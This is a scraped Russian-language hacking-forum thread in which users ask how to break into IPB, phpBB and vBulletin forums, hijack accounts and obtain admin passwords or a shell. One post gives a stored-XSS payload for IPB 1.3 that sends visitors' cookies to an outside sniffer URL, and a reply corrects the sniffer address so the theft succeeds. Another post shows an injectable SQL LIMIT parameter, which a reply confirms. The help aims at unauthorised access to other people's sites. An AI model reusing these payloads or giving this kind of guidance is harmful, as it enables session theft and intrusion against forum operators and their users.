Форумы Общие вопросы по взлому форумов...

Discussion in 'Уязвимости CMS/форумов' started by Lowerewol, 29 Nov 2005.

  1. brlamo

    brlamo Banned

    Joined:
    15 May 2008
    Messages:
    12
    Likes Received:
    24
    Reputations:
    0
    В случае Ipb как узнать версию форума?
     
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    brlamo, https://forum.antichat.ru/thread11615.html

    https://forum.antichat.ru/thread15678.html
     
  3. ac1D

    ac1D Elder - Старейшина

    Joined:
    14 Mar 2007
    Messages:
    107
    Likes Received:
    18
    Reputations:
    1
    такой вопрос: если у меня снизу страницы форума написано Powered by PN_phpBB_14 version 1.7.3.2, то какая версия форума? 1,7,3,2 или какая-то другая?
     
  4. Серенький

    Joined:
    13 Apr 2007
    Messages:
    113
    Likes Received:
    145
    Reputations:
    83
    это модуль форума к PostNuke, версии 1.7.3.
     
  5. ac1D

    ac1D Elder - Старейшина

    Joined:
    14 Mar 2007
    Messages:
    107
    Likes Received:
    18
    Reputations:
    1
    а тут есть оюзор его узявимостей, просто в прикрепленных темах что-то не нашел такого
     
  6. Gianni

    Gianni Member

    Joined:
    30 Jun 2008
    Messages:
    13
    Likes Received:
    5
    Reputations:
    0
    помогите использовать уязвимость в 2.0.20.. чо то я с этим аватарам.. не понимаю как чо делать
     
  7. TehRn

    TehRn New Member

    Joined:
    8 Jul 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    взлом форума ipb 1.3

    скажите правильно, ли я всё зделал

    создал тему и в посте написал (без звёздочек) :
    Code:
     [em*ail]wj@wj[ur*l=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+docu*ment.cookie);`

    А на снифер ни чего неприходит

    почему?
     
  8. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    586
    Likes Received:
    285
    Reputations:
    51
    адрес сниффера http://old.antichat.ru/cgi-bin/s.jpg
     
  9. TehRn

    TehRn New Member

    Joined:
    8 Jul 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    спс огромное помогло!

    еще вопрос: а ,если код поместить в подпись он будет работать?
     
  10. OMG!!

    OMG!! Elder - Старейшина

    Joined:
    25 Feb 2008
    Messages:
    231
    Likes Received:
    70
    Reputations:
    -3
    Что можно сделать с Ipb 2.1.7 ? ведь это одна из самых взломостойких версий.. в идеале нужен шелл ) паролей до админки пока нет. ремоут пасс чейнджер (эксплоит на перле что ли ) не работает ( видимо патченный форум . )
     
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    OMG!!, а если попробовать поискать на milw0rm.com или Securitylab.ru эксплоиты? Какие цели ты преследуешь? Поломать любыми способами? Или утянуть хеш администратора?
     
  12. OMG!!

    OMG!! Elder - Старейшина

    Joined:
    25 Feb 2008
    Messages:
    231
    Likes Received:
    70
    Reputations:
    -3
    Ershik, являясь администратором ресурсов в своей сети.. хеш админа на этом форуме у меня есть.. буду надеятся, что он совпадет с админкой на его форуме.. но хеш жесток, и пока его не взломали. Цель - получить доступ к кое-чему на этом сервере. Самое дырявое на том ресурсе - пожалуй сайт на джумле ( проверял все компоненты.. ничего путного нет ) и этот форум.. :) вот..
     
  13. LamerNAH

    LamerNAH Banned

    Joined:
    5 Nov 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Я не понял 1)xss(активные и пассивные)
    Смотрите значит я пишу просто пост вставляю этот когд потом юзер что должен сделать? нажать на мой пост или нажать на тот код или как? и потом на какой снифер должны прийти кукис? как я с того снифера смогу их достать?
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    hi мне на форуме нужно 200 постов чтоб инфу читать..
    мне бы любой акк с 200 месагами..
    стоит булка переделанная, брут будет долго... хсс.. чтот не разкрутил..модулей не обнаружил.
    короче) вопрос КАК можно чтото сделать?


    OMG!!
    IPB 2.1.7 remote password changer будет работать только есть debug level = 3
    осталась скуля:
    и хсс:
     
    #54 sabe, 22 Jul 2008
    Last edited: 22 Jul 2008
  15. mash16

    mash16 New Member

    Joined:
    30 Jul 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    -1
    Знатоки,помогите:

    forum/weblogs_news.php?=&order=&start=-20

    пишет:

    DEBUG MODE

    SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 7

    SELECT e.entry_id, e.entry_access, e.entry_subject, e.entry_time, e.entry_views, e.entry_poster_id, e.entry_text, e.bbcode_uid, e.entry_mood, e.entry_currently, e.currently_text, e.entry_replies, u.user_id, u.username FROM weblog_entries AS e, users AS u WHERE entry_access <= 0 AND e.entry_poster_id = u.user_id AND e.entry_deleted <> 1 ORDER BY entry_id DESC LIMIT -20, 20

    Line : 150
    File : weblogs_news.php

    здесь можно сделать SQL inj?
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    mash16
    иньекция как я понимаю в лимите..
     
  17. kentuss

    kentuss New Member

    Joined:
    29 Mar 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    -3
    как узнать пароль админа на форуме Invision Power Board v1.3.1 Final ?? помогите плиз
     
  18. RomaM65

    RomaM65 New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Люди а не подскажете как можно брутить форумы на phpBB а то у меня акк угнали а я надеюсь вернуть брутом или чем нить другим я лично форум ломать не хочу а только свой акк вернуть
    Плизз поделитесь опыцтом в етих делах с чего начать или кратко поясните
     
  19. AzzkyAspid

    AzzkyAspid New Member

    Joined:
    21 Mar 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Товарищи, прошу помочь!

    Дано: форум Bulletin® v3.8.0 Release Candidate 1, мой аккаунт с правами юзера.

    Необходимо: удалить свой профиль.

    Решение: как????

    Доп.инфа: облазил всю вкладку Мой кабинет - нет и намека на кнопку "Удалить профиль".
     
  20. 1ce666

    1ce666 Member

    Joined:
    9 Dec 2008
    Messages:
    46
    Likes Received:
    79
    Reputations:
    -4
    Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???
     
Loading...